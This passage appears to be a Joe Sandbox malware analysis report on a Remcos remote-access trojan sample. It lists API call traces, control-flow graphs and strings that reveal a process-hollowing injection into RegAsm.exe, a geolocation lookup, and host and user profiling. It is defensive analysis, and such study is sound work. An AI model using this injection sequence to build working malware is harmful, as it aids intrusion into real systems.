                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                          • ReadProcessMemory.KERNEL32 ref: 004182A6
                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                          • NtClose.NTDLL(?), ref: 00418332
                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                          • WriteProcessMemory.KERNEL32 ref: 00418446
                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                          • ResumeThread.KERNEL32(?), ref: 00418470
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                          • NtClose.NTDLL(?), ref: 004184A3
                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                          • GetLastError.KERNEL32 ref: 004184B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                          • API String ID: 316982871-3035715614
                          • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                          • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                          • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                          • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                          Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1624 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1631 10001177-1000119e lstrlenW FindFirstFileW 1624->1631 1632 10001168-10001172 lstrlenW 1624->1632 1633 100011a0-100011a8 1631->1633 1634 100011e1-100011e9 1631->1634 1632->1631 1635 100011c7-100011d8 FindNextFileW 1633->1635 1636 100011aa-100011c4 call 10001000 1633->1636 1635->1633 1638 100011da-100011db FindClose 1635->1638 1636->1635 1638->1634
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                          • FindClose.KERNEL32(00000000), ref: 100011DB
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                          • String ID:
                          • API String ID: 1083526818-0
                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                          Function 0040F7E2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                          • ExitProcess.KERNEL32 ref: 0040F905
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseExitOpenProcessQuerySleepValue
                          • String ID: 5.1.2 Pro$`.|$override$pth_unenc
                          • API String ID: 2281282204-2557566216
                          • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                          • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                          • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                          • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                          Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1687 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1692 41b456-41b477 InternetReadFile 1687->1692 1693 41b479-41b499 call 4020b7 call 403376 call 401fd8 1692->1693 1694 41b49d-41b4a0 1692->1694 1693->1694 1696 41b4a2-41b4a4 1694->1696 1697 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1694->1697 1696->1692 1696->1697 1700 41b4b8-41b4c2 1697->1700
                          APIs
                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                          Strings
                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleOpen$FileRead
                          • String ID: http://geoplugin.net/json.gp
                          • API String ID: 3121278467-91888290
                          • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                          • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                          Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                          • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                          • String ID:
                          • API String ID: 3950776272-0
                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                          Function 0041B890 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: SystemTimes$Sleep__aulldiv
                          • String ID:
                          • API String ID: 188215759-0
                          • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                          • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                          • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                          • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                          Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,007C9238), ref: 004338DA
                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Context$AcquireRandomRelease
                          • String ID:
                          • API String ID: 1815803762-0
                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                          Function 0041B69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Name$ComputerUser
                          • String ID:
                          • API String ID: 4229901323-0
                          • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                          • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                          • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                          • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                          Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                          • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                          • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                          • Instruction Fuzzy Hash:
                          Function 0040EA00 Relevance: 88.3, APIs: 15, Strings: 35, Instructions: 795COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 93 40ef2c 89->93 94 40ec57 90->94 95 40ec59-40ec65 call 41b354 90->95 93->49 94->95 105 40ec67-40ec69 95->105 106 40ec6e-40ec72 95->106 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 105->106 108 40ecb1-40ecc4 call 401e65 call 401fab 106->108 109 40ec74 call 407751 106->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 142 40ec9c-40eca2 120->142 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 142->108 143 40eca4-40ecaa 142->143 143->108 146 40ecac call 40729b 143->146 146->108 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 191 40ee59-40ee7d call 40247c call 434829 183->191 184->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                          APIs
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                          • String ID: 0o|$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-7B1J99$Software\$User$`.|$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                          • API String ID: 2830904901-4222066092
                          • Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                          • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                          • Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                          • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                          Function 00414F65 Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 809sleepnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 613 415220-415246 call 402093 * 2 call 41b580 606->613 614 41524b-415260 call 404f51 call 4048c8 606->614 630 415ade-415af0 call 404e26 call 4021fa 607->630 613->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 614->629 614->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 642 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->642 643 415b18-415b20 call 401e8d 630->643 642->643 643->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 